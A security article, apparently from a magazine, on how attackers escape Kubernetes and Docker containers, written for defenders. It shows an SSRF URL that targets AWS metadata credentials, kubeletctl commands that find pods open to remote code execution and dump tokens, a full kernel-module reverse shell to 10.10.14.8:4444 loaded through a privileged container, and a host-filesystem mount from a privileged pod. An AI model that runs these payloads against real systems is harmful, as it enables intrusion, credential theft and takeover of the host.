Securing the container environment
Escape Room
An escape room is an immersive team-building game in which friends or colleagues work together to solve puzzles and clues to escape a room before time runs out. Within the domain of Kubernetes [1] and Docker [2], one of the primary goals for malicious actors is seeking to compromise a pod or Docker instance. Once they find a way to escape to the host, they can gain root access, resulting in critical consequences – i.e., game over .
Securing the container means addressing multiple layers in the container's environment, such as access and control, internal permissions, network segmentation, vulnerability management, misconfigurations, and excessive privileges, among other things. Also, you need to differentiate whether containers are deployed within a cloud provider's infrastructure or as on-premises clusters, because each requires a different approach, such as identity access management roles, managed infrastructure, and so forth.
Comprehensive coverage of all these aspects would not fit in a single article, so my focus is directed toward various techniques that threat actors or penetration testers may employ to evade container defenses, especially escaping to the host to gain full access to the cluster. Understanding the tactics used is particularly beneficial for blue team members tasked with defense and implementing security controls.
Main Entry Points
To compromise containers, a door has to be open somewhere, so this task can pose challenges, particularly if the container is fortified with robust security measures. Some of the most common tactics that bad actors use to break into containers include:
1. Application vulnerability. Containers are frequently built from images, which can (and most often do) contain vulnerabilities. Attackers might exploit these vulnerabilities to gain access to the container or execute malicious code. One of the most common vulnerabilities for containers is server-side request forgery (SSRF):
2. Server-side request forgery: This form of attack might cause the server to make a connection to internal-only services, potentially leading to unauthorized access. If any application has flaws, these can be exploited to access internal resources. SSRF vulnerabilities can arise from improper input validation or inadequate access controls on the server. Exploitation of SSRF occurs when threat actors supply malicious input (e.g., URLs or IP addresses) in places where the server makes requests to external resources.
An example will make it easier to understand: Consider a typical scenario on a website where users input URLs. If the application lacks an adequate validation mechanism, attackers can manipulate the input to request arbitrary data from local destinations, leading to potential security issues. Although this example is typical, numerous other attack vectors exist. Some attacks can have a bigger effect – particularly those ocurring in cloud environments – by exploiting vulnerabilities granting access to sensitive metadata services.
Just think for a moment of the potential effect if a web application were to permit the URL http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-role-attached on an input field. That action could fetch the AWS access keys and associated secrets for the AWS account, and depending on the permissions granted to the specific role, it could be devastating.
3. Misconfigurations: Improperly configured Kubernetes or Docker settings can expose sensitive information or provide unauthorized access. Bad actors might look for exposed ports, weak passwords, or misconfigured access controls.
4. RBAC bad practices: Role-based access control (RBAC) is a crucial aspect of container security, but certain bad practices can undermine its effectiveness. Some examples of bad practices in RBAC for container security include:
- Excessive privileges: Assigning overly broad permissions to users or service accounts within containers can increase the attack surface. Not following the principle of least privilege (PoLP) increases the risk of privilege escalation attacks and unauthorized access to sensitive resources. One good example of a common misconfiguration occurs when RoleBindings and ClusterRoleBindings are assigned to the system:anonymous account, inadvertently providing privileges to anonymous users.
- Shared credentials: Sharing credentials among multiple containers or users and tenants can make it a challenge to trace actions to specific individuals or processes. It also increases the risk of unauthorized access if credentials are compromised.
- Lack of proper logging and monitoring: Without a good detection method in place for unauthorized access or suspicious activities, it becomes difficult to identify security breaches promptly and respond effectively. By avoiding these bad practices, you can minimize the risk of unauthorized access and data breaches.
5. Insecure APIs. Both Docker and Kubernetes provide APIs for managing containers and clusters. However, improperly configured APIs can serve as entry points for threat actors to gain unauthorized access. Once inside the cluster, malicious actors could perform various actions such as deploying new containers, implanting back doors, and accessing sensitive information.
The kubelet plays a critial role in Kubernetes; it is responsible for managing the state of individual nodes in a Kubernetes cluster. Running on each node, it communicates with the Kubernetes API server to ensure container health and functionality. By default, kubelet
operates on TCP port 10250.
The Kubernetes website provides very little documentation about the API and the rest of the undocumented APIs. However, CyberArk [3] created an open source tool named kubeletctl
[4] that implements any kubelet API call to make it simpler to run commands than with curl
.
When the server's anonymous auth
argument is enabled, requests not rejected by other authentication methods are treated as anonymous requests. These requests are then served by the kubelet server, leaving it vulnerable for an attack. Nowadays, it is set by default to not anonymous, but many outdated clusters still could be in the wild.
I will demostrate the process of running this tool to scan a misconfigured cluster and execute commands on vulnerable pods. To begin, you need to install kubeletctl
and then run commands to scan for vulnerabilities and to enumerate all pods on that node (Figure 1). For the parameters allowed, you can add one server IP address or a full CIDR (IP range):
kubeletctl pods --server 3.71.72.105 -i kubeletctl pods --cidr 3.71.72.0/24 -i
To scan all pods vulnerable to remote code execution (RCE) , run one of the commands
kubeletctl scan rce --server 3.71.72.105 -i kubeletctl scan rce --cidr 3.71.72.0/24 -i
The next example runs a command on a vulnerable pod and then it will enumerate all the secrets from the cluster (Figure 2):
kubeletctl exec "whoami" -c container_name -p pod_name -n namespace --server 3.71.72.105 -i kubeletctl scan token --server 3.71.72.105 -i
6. Container breakouts: Attackers might exploit vulnerabilities in the container runtime of a Docker container or a Kubernetes pod to gain access to the host system if the container or pod is not properly isolated. In the next section, I describe some use cases and show you how this works in real life.
Escaping to the Host
By default, Docker containers are unprivileged and cannot, for example, run a Docker daemon inside a Docker container, because a container is not allowed to access any devices; however, a container run in privileged mode is given access to all devices. In addition to the --privileged
flag, you can customize which capabilities you want your container to run with --cap-add
and --cap-drop
.
Docker has a default list of capabilities (Table 1), but Kubernetes follows a different approach, which allows you to add or drop capabilities in the SecurityContext
field of a container:
securityContext: capabilities: add: - SYS_NICE drop: - SYS_MODULE
Table 1
Docker Capabilities Mapped to Linux
Docker Capabilities | Linux Capabilities |
---|---|
SETPCAP
|
CAP_SETPCAP
|
SYS_MODULE
|
CAP_SYS_MODULE
|
SYS_RAWIO
|
CAP_SYS_RAWIO
|
SYS_PACCT
|
CAP_SYS_PACCT
|
SYS_ADMIN
|
CAP_SYS_ADMIN
|
SYS_NICE
|
CAP_SYS_NICE
|
SYS_RESOURCE
|
CAP_SYS_RESOURCE
|
SYS_TIME
|
CAP_SYS_TIME
|
SYS_TTY_CONFIG
|
CAP_SYS_TTY_CONFIG
|
MKNOD
|
CAP_MKNOD
|
AUDIT_WRITE
|
CAP_AUDIT_WRITE
|
AUDIT_CONTROL
|
CAP_AUDIT_CONTROL
|
MAC_OVERRIDE
|
CAP_MAC_OVERRIDE
|
MAC_ADMIN
|
CAP_MAC_ADMIN
|
NET_ADMIN
|
CAP_NET_ADMIN
|
SYSLOG
|
CAP_SYSLOG
|
CHOWN
|
CAP_CHOWN
|
NET_RAW
|
CAP_NET_RAW
|
DAC_OVERRIDE
|
CAP_DAC_OVERRIDE
|
FOWNER
|
CAP_FOWNER
|
DAC_READ_SEARCH
|
CAP_DAC_READ_SEARCH
|
FSETID
|
CAP_FSETID
|
KILL
|
CAP_KILL
|
SETGID
|
CAP_SETGID
|
SETUID
|
CAP_SETUID
|
LINUX_IMMUTABLE
|
CAP_LINUX_IMMUTABLE
|
NET_BIND_SERVICE
|
CAP_NET_BIND_SERVICE
|
NET_BROADCAST
|
CAP_NET_BROADCAST
|
IPC_LOCK
|
CAP_IPC_LOCK
|
IPC_OWNER
|
CAP_IPC_OWNER
|
SYS_CHROOT
|
CAP_SYS_CHROOT
|
SYS_PTRACE
|
CAP_SYS_PTRACE
|
SYS_BOOT
|
CAP_SYS_BOOT
|
LEASE
|
CAP_LEASE
|
SETFCAP
|
CAP_SETFCAP
|
WAKE_ALARM
|
CAP_WAKE_ALARM
|
BLOCK_SUSPEND
|
CAP_BLOCK_SUSPEND
|
With capabilities, you can grant certain privileges to a process without granting all the privileges of the root user. Some capabilities can be dangerous and risky, and bad actors will leverage those privileges to compromise the host.
The CAP_SYS_MODULE
capability allows the insertion and removal of kernel modules from a container directly into the host machine. Consider the security implications this capability presents: privilege escalation and complete system compromise by allowing modifications to the kernel and, most importantly, by bypassing all Linux security layers and container isolation mechanisms.
To demonstrate this behavior, the following steps grant complete access to the host by inserting a pre-built kernel module. On the host node, I develop a kernel module that initiates a reverse shell to a specified destination by creating the revershell.c
kernel file (Listing 1) and the makefile (Listing 2) to be compiled. Note that in the makefile, the spaces you see before the make
commands are tabs.
Listing 1
Reverse Shell
#include <linux/kmod.h> #include <linux/module.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("AttackDefense"); MODULE_DESCRIPTION("LKM reverse shell module"); MODULE_VERSION("1.0"); char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL}; static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; // call_usermodehelper function is used to create user mode processes from kernel space static int __init reverse_shell_init(void) { return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit);
Listing 2
Makefile
obj-m +=revershell.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Now executing make
creates the revershell.ko
file, which is the kernel module. Once it is compiled, you must launch a privileged Docker container equipped with the SYS_MODULE
capability after ensuring that the Docker daemon is installed on your machine:
docker run --rm --privileged -it alpine sh
Next, determine a method to transfer your newly created kernel module into the running container. One straightforward approach is to run a web server (with a pre-built Python plugin) in the same directory as the file and then, from the container, use wget
to retrieve the file:
python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
On the running container, you get a shell and then run the wget
command shown in Listing 3 with its output to download the revershell
file. Now make the module executable and insert the module into the host:
chmod +x revershell.ko insmod revershell.ko
Listing 3
Download revershell File
wget http://172.18.0.1:8000/revershell.ko Connecting to 172.18.0.1:8000 (172.18.0.1:8000) saving to 'revershell.ko' revershell.ko 100% |****************************************************************| 111k 0:00:00 ETA 'revershell.ko' saved
On the host, you can verify that the kernel has been loaded successfully by running lsmod
and searching for the name of the module. In Figure 3 you can see the active module you executed before.
Some methods let you add limits on what a capability can perform by implementing security controls that are out of the box on the operating system. The following are the most important and popular methods:
- AppArmor [5] is a security enhancement to confine containers to a limited set of resources. You can configure it for any application to reduce its potential attack surface. On Kubernetes, it restricts what containers are allowed to do.
- Secure computing (seccomp) [6] can limit the syscalls a container can call. A default seccomp profile is enabled by default (only if Docker has been built with
seccomp
and the kernel is configured withCONFIG_SECCOMP
enabled) when running Docker containers, but if you run a privileged container, it will be disabled. Also note that when running on a Kubernetes cluster, it is disabled by default. - The open source SELinux [7] project allows admins to have more control over who can access the system. As with seccomp, if running the container with the
--privileged
flag, it will also remove or disable the security feature.
Abusing Exposed Host Directories
When running a pod or Docker in privileged mode, it is possible to mount the host root filesystem into the container. In this example, I use a Kubernetes pod in privileged mode (privileged: true
):
apiVersion: v1 kind: Pod metadata: name: nginx spec: containers: - name: nginx image: nginx securityContext: privileged: true
You need to save the file as privileged_pod.yaml
, then deploy it on your cluster and get a shell into your newly created container with
kubectl apply -f privileged_pod.yaml kubectl exec nginx -it -- /bin/bash
From the prompt of your container, create a directory and mount the root filesystem (run lsblk
to verify the host filesystem; in this case, nvme0n1p1
):
mkdir /mnt/host_root mount /dev/nvme0n1p1 /mnt/host_root
Now if you change directory to /mnt/host_root
, you can see all files from the host system (e.g., /etc/passwd
and other interesting and sensitive files).
Buy this article as PDF
(incl. VAT)